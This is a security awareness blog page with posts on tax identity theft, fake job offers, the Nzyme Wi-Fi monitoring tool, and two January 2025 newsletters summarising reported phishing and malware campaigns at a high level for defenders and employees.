Tax Fraud: How to Avoid Criminals Filing Fraudulent Returns

January 30, 2025

This is a post I put together for my own internal security awareness program. Feel free to grab and use within your own organization. Created with help from ChatGPT.

Tax season is a time when individuals and businesses focus on filing their returns and securing their refunds. However, it is also a prime opportunity for fraudsters looking to exploit the system. One particularly alarming form of fraud is when criminals file tax returns on behalf of individuals without their knowledge, stealing valuable refunds in the process. This type of fraud, known as tax-related identity theft, can have serious financial consequences for the victim. In this post, we'll dive into how this scheme works, its impact, and the steps you can take to protect yourself.

How the Scheme Operates

Data Acquisition Criminals obtain personal information through a variety of methods, such as data breaches, phishing attacks, or purchasing stolen data from underground markets. This personal information—such as your Social Security number and other identifying details—becomes their key to committing fraud.
Filing False Returns Once they have the necessary information, criminals file tax returns on behalf of individuals without their consent, typically early in the tax season to get ahead of the legitimate filer.
Refund Diversion The fraudsters request that the refund be deposited into bank accounts they control, bypassing the rightful taxpayer entirely. By the time the legitimate taxpayer files their return, the criminals have already claimed the refund.

Consequences for Victims

Delayed Refunds The IRS will flag the duplicate filings, resulting in significant delays for the legitimate taxpayer's refund. This can cause frustration and financial strain, especially if the refund was anticipated to cover expenses.
Tax Liabilities Victims may find themselves liable for taxes owed on fraudulent returns filed by the criminals. This unexpected liability can lead to a tax debt that wasn’t part of the original financial planning.
Identity Theft Beyond the immediate tax consequences, the stolen personal information can be used in other fraudulent activities, such as opening new credit accounts or applying for loans in the victim’s name.

How to Protect Yourself

File Early One of the best ways to prevent criminals from filing fraudulent returns is to file your taxes early. The sooner your return is filed, the less likely criminals are to file a fake return using your information. Early filing reduces the opportunity for fraudsters to get to your refund first.
Use a Reputable Tax Service Ensure that the tax preparer you use is legitimate and has a good reputation. If you're using a tax professional, verify their credentials, such as their IRS Preparer Tax Identification Number (PTIN). Check online reviews or ask for referrals from trusted sources to avoid working with fraudulent tax preparers who might exploit your information.
Consider an Identity Protection PIN (IP PIN) The IRS offers an Identity Protection PIN program, which provides an added layer of security for taxpayers. This PIN is used when filing taxes and helps prevent unauthorized returns from being filed in your name.

Conclusion

Tax fraud in the form of criminals filing fraudulent returns can cause significant stress and financial loss. By understanding how the scheme works and taking proactive measures, you can better protect yourself from becoming a victim. Filing early, using a reputable tax service, monitoring your personal information, and using additional security measures like an IP PIN are all critical steps in preventing and mitigating the effects of tax-related identity theft.

Beware of Fake Job Offers in the 2025 job market

January 17, 2025

In today's job market, the allure of remote work has become increasingly enticing. However, companies have started to shift away from remote work post-pandemic and are requiring more in-person or hybrid for employees. Combine that with the downsizing companies are going through at this time and job scams are going to pop up on a more regular basis. Recently, I got the above text from a “recruiter.”

While this might seem like a great opportunity it’s a scam. A job offer does not typically come over text nor does it happen without an interview. This is a path to getting personal information, financial, or drawn into the scam ecosystem as a money mule.

The Scam: Too Good to Be True

The scam typically begins with an unsolicited message from an individual claiming to be "Emily," a customer service agent at Bonanza. The message outlines an attractive remote position with the following promises:

High Earnings: Potential to earn between $50 to $500 per day, with a base salary of $1,000 for every four days worked.
Flexible Hours: Commitment of just 60 to 90 minutes per day.
Comprehensive Benefits: Offers include paid annual leave, maternity and paternity leave, and other legal holidays.
Minimal Effort: Assurances of free training and a guaranteed paid probation period.

Recipients are encouraged to respond to a provided phone number to seize this "opportunity."

Red Flags in the Offer

While the proposition may appear appealing, several indicators suggest it's a scam:

Unsolicited Contact: Legitimate companies seldom extend job offers without prior interaction or application. Receiving such a message without prior engagement is suspicious.
Free Email Account: This text was sent with a Gmail account that anyone that is available to anyone for free.
Exaggerated Earnings and Benefits: Promises of substantial income for minimal work are classic red flags. Genuine employers provide realistic compensation aligned with industry standards.
Vague Job Description: The lack of specific details about job responsibilities, using ambiguous phrases like "helping merchants update data," is a common tactic to obscure the scam's true nature.
Urgency to Respond: Scammers often create a sense of urgency to prevent thorough consideration. Pressuring immediate action is a tactic to catch victims off-guard.
Unprofessional Communication: Errors in grammar, informal language, or inconsistencies in the message are telltale signs of fraudulent communication.
Request for Contact via Personal Number: Legitimate companies typically use official communication channels. Requests to contact personal numbers are uncommon and suspicious.

What Happens If You Respond?

Engaging with the scammer can lead to several detrimental outcomes:

Phishing for Personal Information: Scammers may request sensitive data, such as Social Security numbers or banking details, under the guise of processing employment paperwork.
Upfront Payments: Requests for fees covering "training" or "equipment," with promises of reimbursement, are common. Once paid, these funds are unrecoverable.
Identity Theft: Shared personal information can be exploited for identity theft, leading to financial and legal complications.
No Real Job: After extracting money or information, the scammer disappears, leaving the victim without employment and at a loss.
Become a Money Mule: A money mule is someone who transfers or moves illegally acquired money on behalf of others, often unknowingly.

Protecting Yourself from Job Scams

To shield yourself from such fraudulent schemes, consider the following precautions:

Research the Company: Visit the official website and verify job postings. Authentic opportunities are listed on company websites or reputable job boards.
Verify the Contact: Ensure that communications come from official company channels. Be wary of contacts using personal email addresses or phone numbers.
Be Skeptical of Extravagant Claims: If an offer seems too good to be true, it warrants skepticism. Legitimate jobs have clear expectations and reasonable compensation.
Never Pay to Work: Authentic employers do not require upfront payments for any reason.
Report Suspicious Offers: Report potential scams to the Federal Trade Commission (FTC) at ReportFraud.ftc.gov and to the platform where the offer was encountered.

Conclusion

Scammers continually adapt their tactics to exploit the evolving job market and technological landscape. By staying informed and vigilant, you can protect yourself from falling victim to such schemes. Always verify the legitimacy of job offers and remain cautious of unsolicited communications. Remember, if something feels amiss, it's worth investigating further. Stay safe and informed in your job search and digital interactions.

Nzyme: Your Wi-Fi Watchdog Against Wireless Woes

January 14, 2025

This was originally posted on LinkedIn by Kyle Goode. In effort to get the blog section more populated I’ve reached out to some authors and asked if they’d be okay having their content put on this site. Kyle was gracious enough to let me grab his posts and highlight them here. Make sure to give him a follow on LinkedIn.

Nzyme is a unique open-source Wi-Fi security solution. I have been a user since its 1.0 version, and to this day, I haven’t come across another platform that focuses as effectively on Wi-Fi security. While most access points can detect rogue access points, few offer the same level of capability as Nzyme.

Nzyme introduces the concept of "bandits," which scan and alert on common Wi-Fi penetration testing tools such as the Pwnagotchi, Wi-Fi Pineapple, and Flipper Zero ESP32. These tools are uniquely fingerprinted by the platform. Owning any of these "bandits" makes it easy and efficient to develop and test alert rules in real time.

Currently, alerts are limited to SMTP and can be categorized into two types:

System-based alerts: Triggered if parts of the platform, such as taps, start failing.
Security-based alerts: Triggered when a bandit is detected in the environment, malicious deauthentication packets are transmitted, or rogue access points are detected.

The Nzyme platform consists of a PostgreSQL database, the core Nzyme platform (called the Nzyme node), and a Wi-Fi dongle (called a Nzyme tap). These components are primarily run on Debian- or Ubuntu-based systems. While Raspbian is often recommended, regular Debian works just as well. Taps are Ubuntu-only but are also compatible with Debian systems.

Evolution from 1.0 to 2.0

In the 1.0 version, Nzyme was fully integrated, running as a single service. With the 2.0 alpha versions, the architecture has evolved to support a multi-node setup. You can now run a single Nzyme node and deploy as many Nzyme taps as needed for comprehensive network coverage. These components are distributed as separate packages.

One exciting feature introduced in 2.0 is trilateration, which requires at least three taps on the same floor of a building. Trilateration allows you to pinpoint the location of rogue devices, such as bandits. This is particularly useful if a threat actor gains physical access to your building and places a malicious device in an inconspicuous location, a common technique used by penetration testers. The 1.0 version even provided guidance on building a handheld tracking device for bandits, though I wasn’t brave enough to attempt it at the time.

The 2.0 version also adds support for Ethernet monitoring. By using a span/mirror/tap port on a switch, you can monitor network activity, such as DNS tunneling, beaconing, and remote connections like SSH. While I typically rely on Suricata with Snort rules and Zeek with RITA for comprehensive network monitoring, Nzyme’s Ethernet capability provides a simpler configuration and adds redundancy. Additionally, ARP analysis appears to be a planned feature in future versions.

System Monitoring and API Integration

Nzyme allows you to create monitored networks for your environment. As I’ve mentioned in a previous article, I’m a big fan of Prometheus for system monitoring and metric gathering. Nzyme offers a native exporter for Prometheus, making it easy to integrate into existing monitoring solutions.

Nzyme has also introduced Nzyme Connect, an API for obtaining GeoIP, MAC address OUI, and vendor information. Additionally, it offers Bluetooth device discovery. Although this feature is still in its early stages, I’m excited to connect it with my Ubertooth to explore its capabilities further. Nzyme Connect also serves as a SaaS platform for monitoring your Nzyme nodes and taps, with enterprise support now available. For added convenience, prebuilt Wi-Fi kits are offered, eliminating the need for manual configuration.

Future Features and Wishlist

I am eagerly anticipating the stable release of Nzyme 2.0 and the additional features that will come with it. One feature I hope to see in the future is webhook integrations with popular messaging apps like Slack and Teams. This would streamline alerting and incident response for security teams.

Nzyme continues to solidify its position as a versatile and powerful Wi-Fi security solution. Whether you're a security professional, penetration tester, or simply someone concerned about wireless security, Nzyme offers tools to protect your environment against rogue devices and malicious activities. I’m excited to see where this platform goes next.

Resources:

Nzyme

Nzyme Bandits

Nzyme Network Monitoring

Nzyme Trilateration

Nzyme Connect

Nzyme Wifi Kit

January 2025 - Cybersecurity Threat Intelligence Newsletter

January 9, 2025

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

ModeLeak Vulnerabilities in Google's Vertex AI Platform

Palo Alto Networks' Unit 42 team has uncovered two critical vulnerabilities, collectively termed "ModeLeak," within Google's Vertex AI platform. These flaws could enable attackers to escalate privileges and exfiltrate sensitive machine learning (ML) models, including fine-tuned large language model (LLM) adapters.

Key Insights:

Privilege Escalation via Custom Jobs: Attackers can exploit custom job permissions to gain unauthorized access to data services within a project, leading to potential exposure of sensitive information.

Model Exfiltration through Malicious Models: By deploying a poisoned model, adversaries can exfiltrate other fine-tuned models in the environment, risking proprietary data and custom optimizations.

Google has addressed these vulnerabilities by implementing fixes in the Vertex AI platform. Organizations utilizing Vertex AI should review their security protocols to ensure protection against similar threats.

Further Reading: Unit 42 Blog

Black Basta Ransomware Adopts Advanced Social Engineering Tactics

The Black Basta ransomware group has recently enhanced its attack strategies by incorporating sophisticated social engineering techniques, including email bombing, QR code phishing, and the deployment of custom malware payloads.

Key Developments:

Email Bombing: Attackers inundate targets with excessive emails by subscribing their addresses to numerous mailing lists. This tactic overwhelms victims and increases the likelihood of interaction with subsequent malicious communications.

Impersonation via Microsoft Teams: Threat actors pose as IT support personnel, contacting victims through Microsoft Teams to establish trust and facilitate the installation of remote access tools.

QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware.

Custom Malware Deployment: The group utilizes bespoke tools such as KNOTWRAP (a memory-only dropper) and KNOTROCK (a .NET-based utility) to execute ransomware payloads stealthily.

Further Reading: The Hacker News

North Korean IT Workers Infiltrating Global Companies

Recent investigations have uncovered that operatives from the Democratic People's Republic of Korea (DPRK) are securing remote IT positions in international companies under false identities. These individuals channel their earnings to fund North Korea's weapons programs, posing significant security and compliance risks to employers.

Key Insights:

Use of False Identities: North Korean IT workers often utilize stolen or fabricated identities to obtain employment, making detection challenging.

Revenue Generation for DPRK: Earnings from these positions are funneled back to North Korea, supporting its sanctioned weapons development initiatives.

Potential for Insider Threats: Beyond financial implications, these operatives may have access to sensitive company data, increasing the risk of intellectual property theft and cyber espionage.

Further Reading: Unit 42 Blog

North Korean IT Workers Linked to Phishing Attacks via Malicious Video Conferencing Apps

Unit 42 researchers have identified a cluster of North Korean IT operatives, designated as CL-STA-0237, involved in phishing attacks that deploy malware through counterfeit video conferencing applications. Operating primarily from Laos, these individuals have secured positions in various companies, leveraging their roles to further malicious activities.

Key Insights:

Malware Distribution: The group utilizes fraudulent video conferencing platforms to disseminate malware, notably the BeaverTail and InvisibleFerret remote access trojans, compromising systems during supposed job interview processes.

Global Reach: By infiltrating organizations worldwide, these operatives support North Korea's illicit endeavors, including its weapons of mass destruction and ballistic missile programs.

Evolving Tactics: The shift from merely seeking income to engaging in aggressive malware campaigns indicates a significant escalation in their operational strategies.

Further Reading: Unit 42 Blog

Surge in 'ClickFix' Social Engineering Attacks

Cybersecurity researchers have identified a significant increase in the use of a social engineering tactic known as "ClickFix." This method deceives users into copying and pasting malicious commands into their systems, leading to malware infections.

Key Developments:

Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues.

Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT.

Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates.

Further Reading: Proofpoint Blog

Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware.

Key Developments:

Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information.

Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update.

SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions.

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware.

Further Reading: Malwarebytes Blog

DarkGate Malware Leveraging Vishing via Microsoft Teams

Recent analyses have identified a concerning trend in which cybercriminals are deploying DarkGate malware through vishing (voice phishing) attacks conducted via Microsoft Teams.

Key Developments:

Social Engineering Tactics: Attackers impersonate employees from known client organizations during Microsoft Teams calls, convincing victims to download remote desktop applications like AnyDesk.

Malware Deployment: Once remote access is established, DarkGate malware is installed, enabling threat actors to execute malicious commands, gather system information, and maintain persistent access.

Operational Impact: Although some attacks have been thwarted before data exfiltration, the initial breach underscores vulnerabilities in user awareness and the potential for significant security incidents.

Further Reading: Trend Micro Research

Sophisticated Phishing Campaigns Exploit Trusted Platforms

Recent analyses have uncovered advanced phishing campaigns targeting employees across multiple industries and jurisdictions. These operations employ sophisticated techniques to bypass Secure Email Gateways (SEGs) and exploit trusted platforms, creating highly convincing schemes to deceive victims and steal their credentials.

Key Developments:

Exploitation of Trusted Platforms: Attackers leverage familiar platforms and services to enhance the credibility of their phishing attempts, making it more challenging for victims to identify fraudulent communications.

Bypassing Secure Email Gateways (SEGs): The campaigns utilize advanced methods to evade detection by SEGs, allowing malicious emails to reach employees' inboxes undetected.

Wide-Ranging Targets: Over 30 companies across 12 industries and 15 jurisdictions have been affected, indicating a broad and indiscriminate approach by the threat actors.

Further Reading: Group-IB Blog

Top Cyber Attacker Techniques (August–October 2024)

Recent analyses have identified key cyber attacker tactics, techniques, and procedures (TTPs) observed between August 1 and October 31, 2024.

Key Developments:

Phishing Incidents: Phishing accounted for 46% of all customer incidents during this period, indicating a significant rise likely due to high employee turnover and the accessibility of phishing kits.

Prevalent Malware: "SocGholish" and "LummaC2" emerged as the most frequently observed malware in customer environments, highlighting their widespread use in recent attacks.

Cloud Services Alerts: There was a 20% increase in cloud services alerts, correlating with the rising adoption of cloud accounts and associated security challenges.

Ransomware Activity: Despite a slowdown in "LockBit" ransomware activity due to law enforcement actions and a loss of affiliate trust, it remains a key player. Meanwhile, "RansomHub" is rising rapidly due to its attractive ransomware-as-a-service (RaaS) model. The U.S., manufacturing sector, and professional, scientific, and technical services (PSTS) sector are primary targets amidst an overall increase in ransomware attacks.

Initial Access Broker (IAB) Activity: IAB activity increased by 16%, heavily targeting U.S.-based organizations, possibly due to perceived financial capabilities stemming from cyber insurance.

Insider Threat Content: A 7% rise in insider threat discussions on cybercrime forums was noted, driven by significant financial incentives, underscoring the growing complexity of cybersecurity challenges.

Impersonating Domain Alerts: There was a 6% increase in alerts related to impersonating domains, indicating ongoing reliance on simple techniques to capture credentials and data.

Further Reading: ReliaQuest Blog

Phishing Attacks Double in 2024

Recent analyses reveal a significant surge in phishing activities throughout 2024, with overall phishing messages increasing by 202% in the latter half of the year. Notably, credential phishing attacks have escalated by 703% during the same period.

Key Developments:

Prevalence of Zero-Day URLs: Approximately 80% of malicious links identified are zero-day threats—newly created URLs designed to evade traditional detection methods.

Diversification of Attack Vectors: While link-based phishing remains predominant, there is a notable increase in text-based threats, such as business email compromise (BEC) and invoice scams, as well as file-based threats employing techniques like HTML smuggling.

Expansion Beyond Email: Phishing attacks are increasingly targeting multiple platforms, including SMS, LinkedIn, and Microsoft Teams, indicating a shift towards multichannel approaches.

Further Reading: Infosecurity Magazine

Surge in Phishing Attacks via New Top-Level Domains

Recent analyses reveal a significant increase in phishing attacks, with a 40% rise observed in the year ending August 2024. A substantial portion of this growth is attributed to the exploitation of new generic top-level domains (gTLDs) such as .shop, .top, and .xyz, which are favored by cybercriminals due to their low registration costs and minimal verification requirements.

Key Developments:

Disproportionate Use in Cybercrime: Although new gTLDs constitute only 11% of the market for new domains, they account for approximately 37% of reported cybercrime domains between September 2023 and August 2024.

Attraction to Low-Cost Registrations: Registrars offering domain registrations for less than $1, with little to no identity verification, are particularly appealing to spammers and scammers seeking to conduct malicious activities anonymously.

ICANN's Expansion Plans: Despite the misuse of these new gTLDs, the Internet Corporation for Assigned Names and Numbers (ICANN) is proceeding with plans to introduce additional gTLDs, potentially broadening the landscape for cybercriminal activities.

Further Reading: Krebs on Security

Surge in Suspicious Domain Registrations Exploiting High-Profile Events

Recent analyses have identified a significant increase in suspicious domain registration campaigns exploiting high-profile events, such as the 2024 Summer Olympics in Paris.

Key Developments:

Event-Driven Domain Registrations: Threat actors register deceptive domains containing event-specific keywords to mimic official websites, aiming to deceive users seeking legitimate information.

Exploitation of Public Interest: Cybercriminals leverage global events to attract large audiences, using fraudulent domains to distribute malware, conduct phishing attacks, or sell counterfeit merchandise.

Indicators of Malicious Activity: Monitoring domain registrations, DNS traffic, URL patterns, and textual characteristics can help identify and mitigate these threats.

Further Reading: Unit 42 Blog

Zloader Malware Adopts DNS Tunneling for Stealthier C2 Communications

Recent analyses have identified that the Zloader malware, a modular Trojan based on the leaked Zeus source code, has incorporated DNS tunneling into its command-and-control (C2) communication methods.

Key Developments:

DNS Tunneling Implementation: Zloader now employs a custom protocol over DNS, utilizing IPv4 to tunnel encrypted TLS network traffic. This technique enables the malware to conceal its C2 communications within standard DNS queries and responses, making detection more challenging.

Enhanced Anti-Analysis Features: The latest version of Zloader includes improved anti-analysis capabilities, such as environment checks and API import resolution algorithms, to evade malware sandboxes and static detection methods.

Interactive Shell Capability: Zloader has introduced an interactive shell that supports over a dozen commands, potentially facilitating hands-on keyboard activity by threat actors during attacks.

Further Reading: Zscaler Blog

Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems.

Key Developments:

Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and CloudFlare.

Clipboard Hijacking: These fake CAPTCHAs silently copy malicious commands to the user's clipboard via JavaScript, prompting them to execute these commands unknowingly through the Windows Run prompt.

Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems.

Further Reading: ReliaQuest Blog

Threat Actors Exploit LDAP for Network Enumeration

Recent analyses have identified that both nation-state and cybercriminal threat actors are leveraging the Lightweight Directory Access Protocol (LDAP) to perform network enumeration within Active Directory environments.

Key Developments:

Abuse of LDAP Attributes: Attackers utilize LDAP queries to extract sensitive information, such as user accounts, group memberships, and permissions, facilitating lateral movement and privilege escalation within compromised networks.

Use of Enumeration Tools: Tools like BloodHound and its data collector, SharpHound, are commonly employed to map Active Directory structures, identifying potential attack paths and high-value targets.

Detection Challenges: Distinguishing between legitimate and malicious LDAP activity is difficult due to the high volume of benign LDAP traffic in typical network environments, complicating efforts to detect and mitigate these attacks.

Further Reading: Unit 42 Blog

'Araneida' Web Hacking Service Linked to Turkish IT Firm

Recent investigations have uncovered that 'Araneida,' a cloud-based web hacking service, is utilizing a cracked version of Acunetix—a commercial web application vulnerability scanner—to facilitate cyberattacks. Notably, this service has been traced back to a Turkish information technology firm.

Key Developments:

Exploitation of Cracked Software: Araneida employs an unauthorized version of Acunetix, enabling users to perform offensive reconnaissance, extract user data, and identify exploitable vulnerabilities on target websites.

Proxy Integration for Anonymity: The service incorporates a robust proxy network, allowing scans to originate from a diverse pool of IP addresses, thereby concealing the true source of the activity.

Cybercriminal Promotion: Advertised on multiple cybercrime forums and boasting a Telegram channel with nearly 500 subscribers, Araneida has been linked to the compromise of over 30,000 websites within six months. One user claimed to have purchased a luxury vehicle using proceeds from payment card data obtained through the service.

Connection to Turkish IT Firm: Investigations reveal that the domain araneida[.]co, operational since February 2023, is associated with an individual employed as a senior software developer at Bilitro Yazilim, an IT firm based in Ankara, Turkey.

Further Reading: Krebs on Security

LLMs Employed to Obfuscate Malicious JavaScript

Recent analyses have revealed that adversaries are leveraging large language models (LLMs) to obfuscate malicious JavaScript code, enhancing its ability to evade detection mechanisms.

Key Developments:

Automated Code Obfuscation: Attackers utilize LLMs to iteratively transform malicious JavaScript through techniques such as variable renaming, dead code insertion, and whitespace removal, without altering the code's functionality.

Evasion of Detection Tools: These LLM-generated variants can bypass traditional detection tools, including static analysis models, by producing natural-looking code that is harder to identify as malicious.

Scalability of Attacks: The use of LLMs enables the creation of numerous unique malware variants at scale, increasing the difficulty for security systems to detect and mitigate these threats effectively.

Further Reading: Unit 42 Blog

Mobile Phishing Attacks Employ New Tactics to Evade Security Measures

Recent analyses have identified a novel social engineering tactic targeting mobile banking users. Attackers are leveraging Progressive Web Apps (PWAs) and WebAPKs to distribute phishing websites disguised as legitimate applications, effectively bypassing traditional security warnings and app store vetting processes.

Key Insights:

Exploitation of PWAs and WebAPKs: Unlike traditional apps, these malicious PWAs and WebAPKs are essentially phishing websites packaged to look like legitimate applications. This means they do not exhibit the typical behaviors or characteristics associated with malware, making detection more challenging.

Bypassing Security Measures: Their ability to bypass traditional security warnings of a mobile operating system, and total sidestepping of app store vetting processes, is particularly concerning. This allows attackers to distribute malicious content without triggering standard security alerts.

Anticipated Increase in Sophistication: It is anticipated that more sophisticated and varied phishing campaigns utilizing PWAs and WebAPKs will emerge, unless mobile platforms change their approach towards them.

Further Reading: KnowBe4 Blog

January 2025 - Security Awareness Newsletter

January 8, 2025

This is a security awareness focused newsletter that I share internally. Feel free to grab and use for your own internal security awareness program. Created with help from ChatGPT.

FBI Shares Strategies to Combat AI-Driven Fraud Schemes

The Federal Bureau of Investigation (FBI) has issued a public service announcement highlighting the increasing use of generative artificial intelligence (AI) by cybercriminals to enhance the sophistication and believability of fraud schemes. These AI-powered tactics are being employed across various fraudulent activities, including romance scams, investment fraud, and job recruitment cons.

Internet Crime Complaint Center

Key Insights:

Enhanced Deception: Generative AI enables criminals to produce highly convincing text, images, audio, and video content, making fraudulent communications appear legitimate and more persuasive.

Voice Cloning: Advanced AI techniques allow for the cloning of voices, which can be used in schemes such as impersonating family members in distress to solicit money or sensitive information.

Synthetic Identities: AI-generated images and profiles are utilized to create fake identities on social media platforms, facilitating social engineering attacks and spear-phishing campaigns.

Recommendations:

Verify Communications: Be cautious of unsolicited messages, especially those requesting personal information or financial transactions. Confirm the authenticity of such communications through direct and reliable channels.

Establish Verification Protocols: Develop secret codes or phrases with family members and trusted contacts to authenticate identities during unexpected or urgent requests.

Limit Personal Information Sharing: Be mindful of the personal data shared on social media and other public platforms, as it can be exploited to craft personalized and convincing scams.

Staying informed about the evolving tactics of AI-driven fraud is crucial in safeguarding personal and financial information.

Further Reading: BleepingComputer Article

Black Basta Ransomware Adopts Advanced Social Engineering Tactics

Key Developments:

Email Bombing: Attackers inundate targets with excessive emails by subscribing their addresses to numerous mailing lists. This tactic overwhelms victims and increases the likelihood of interaction with subsequent malicious communications.

Impersonation via Microsoft Teams: Threat actors pose as IT support personnel, contacting victims through Microsoft Teams to establish trust and facilitate the installation of remote access tools.

QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware.

Further Reading: The Hacker News

Phishing Attacks Target Employee Payroll Accounts

Cybercriminals are increasingly launching phishing attacks aimed at hijacking employee payroll accounts. These schemes often involve fraudulent emails that appear to originate from Human Resources or payroll departments, requesting employees to update or verify their direct deposit information. Unsuspecting employees who comply may inadvertently provide attackers with access to their payroll accounts, leading to unauthorized changes and financial theft.

Key Insights:

Impersonation of Internal Departments: Attackers craft emails that convincingly mimic internal communications from HR or payroll, exploiting employees' trust in these departments.

Urgency and Deception: Messages often convey a sense of urgency, such as impending payroll issues, to prompt quick action without thorough scrutiny.

Credential Harvesting: Links within these emails direct employees to counterfeit login pages designed to capture their credentials, granting attackers unauthorized access.

Further Reading: KnowBe4 Blog

Surge in 'ClickFix' Social Engineering Attacks

Key Developments:

Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues.

Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT.

Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates.

Further Reading: Proofpoint Blog

AI-Driven Investment Scams Proliferate via Social Media

Cybercriminals are increasingly leveraging artificial intelligence (AI) and social media platforms to perpetrate sophisticated investment scams, leading to significant financial and data losses among victims worldwide.

Key Insights:

AI-Generated Deception: Scammers utilize AI to create convincing video testimonials featuring fabricated endorsements from celebrities and financial experts, enhancing the credibility of fraudulent investment schemes.

Social Media Malvertising: Fraudulent advertisements are disseminated through social media channels, often mimicking legitimate company posts or news outlets, to lure potential investors into the scam.

Phishing Tactics: Victims are directed to counterfeit websites designed to harvest personal information under the guise of investment opportunities, leading to identity theft and unauthorized financial transactions.

Recommendations:

Verify Authenticity: Scrutinize investment opportunities, especially those encountered through social media, by researching the offering entity and seeking independent financial advice.

Be Skeptical of High Returns: Exercise caution with schemes promising unusually high or guaranteed returns, as these are common indicators of fraudulent activity.

Protect Personal Information: Avoid sharing sensitive data through unsolicited links or forms; ensure websites are legitimate and secure before providing any personal details.

Staying informed and exercising due diligence are crucial in safeguarding against these evolving AI-driven investment scams.

Further Reading: The Hacker News

Security Alert: Fake Brand Collaboration Scams Targeting YouTube Creators

Cybercriminals are increasingly targeting YouTube content creators by impersonating reputable brands and offering fraudulent collaboration opportunities. These sophisticated phishing campaigns aim to distribute malware, leading to the theft of sensitive information and unauthorized access to creators' systems.

Key Insights:

Impersonation of Trusted Brands: Attackers craft convincing emails that appear to originate from well-known companies, proposing enticing partnership deals to lure creators into their scheme.

Malware Delivery via Documents: The fraudulent offers include attachments, such as contracts or promotional materials, often delivered through password-protected files hosted on platforms like OneDrive to evade detection.

Theft of Sensitive Information: Once the malware is installed, it can steal login credentials, financial data, and grant attackers remote access to the victim's system, compromising both personal and channel security.

Further Reading: CloudSEK Blog

Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware.

Key Developments:

Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information.

Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update.

SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions.

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware.

Further Reading: Malwarebytes Blog

Threat Actors Exploit LinkedIn to Target Job Seekers

Cybercriminals are increasingly leveraging LinkedIn to deceive job seekers through sophisticated employment scams. By creating fake recruiter profiles, often enhanced with AI-generated images, these threat actors craft personalized messages that appear to offer legitimate job opportunities. The objective is to lure victims into clicking on malicious links that lead to phishing sites designed to harvest personal information or deploy malware.

Key Insights:

Personalized Deception: Scammers tailor messages based on the victim's professional background, making the fraudulent offers appear credible and enticing.

Advanced Phishing Techniques: The use of AI-generated recruiter profiles and convincing communication strategies increases the likelihood of victims engaging with malicious content.

Exploitation of LinkedIn Features: By abusing LinkedIn's InMail feature, attackers can reach users outside their immediate network, broadening the scope of potential targets.

Further Reading: KnowBe4 Blog

Cybercriminals Impersonate KnowBe4 in Phishing Attacks

Cybercriminals are impersonating KnowBe4 by sending fraudulent emails that closely mimic legitimate "Please Complete Assigned Training" notifications. These deceptive emails aim to trick recipients into clicking malicious links or downloading harmful attachments, potentially compromising personal and organizational security.

Key Insights:

Sophisticated Mimicry: The phishing emails are designed to closely resemble authentic KnowBe4 training notifications, making it challenging for recipients to distinguish between legitimate and fraudulent communications.

Malicious Intent: Interacting with the links or attachments in these emails can lead to malware infections, unauthorized access to sensitive information, or other security breaches.

Targeted Deception: By exploiting the trust associated with KnowBe4's brand, attackers increase the likelihood of recipients falling victim to the scam.

Further Reading: KnowBe4 Blog

Malicious Advertisements Pose Growing Threat to Internet Users

Cybercriminals are increasingly utilizing malicious advertisements, or "malvertising," to distribute malware and conduct phishing attacks. These deceptive ads often appear as legitimate sponsored content on search engine results pages, making it challenging for users to distinguish between safe and harmful links.

Key Insights:

Prevalence of Malvertising: Malicious actors pay search engines to display their harmful URLs as sponsored ads, which are prominently positioned above legitimate search results. This tactic increases the likelihood of user engagement with malicious content.

Deceptive Appearances: These ads are crafted to closely mimic legitimate websites or services, often using familiar branding and language to deceive users into clicking on them.

Potential Consequences: Interacting with malvertising can lead to malware infections, unauthorized access to personal information, and financial loss.

Further Reading: KnowBe4 Blog

Mobile Phishing Campaign Targets Job Seekers

Cybercriminals are impersonating recruiters to target job seekers with phony employment offers. Researchers at Zimperium warn that a phishing campaign is targeting Android phones to deliver the Antidot banking trojan.

Key Insights:

Sophisticated Social Engineering: Attackers masquerade as job recruiters or HR representatives from well-known organizations, sending well-crafted phishing emails that purport to come from real companies, informing recipients that they’ve been selected to advance in the hiring process.

Malware Delivery: Victims are enticed to download a malicious application, leading to the installation of the Antidot banking trojan on their Android devices.

